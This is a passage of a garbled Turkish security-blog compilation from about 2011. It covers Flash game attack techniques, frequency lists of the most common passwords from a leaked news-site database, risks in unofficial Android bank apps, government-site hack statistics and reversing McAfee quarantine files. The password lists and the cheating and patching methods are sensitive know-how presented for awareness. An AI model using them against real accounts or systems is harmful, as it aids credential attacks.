goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 29: Hack 4 Career - 2011

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

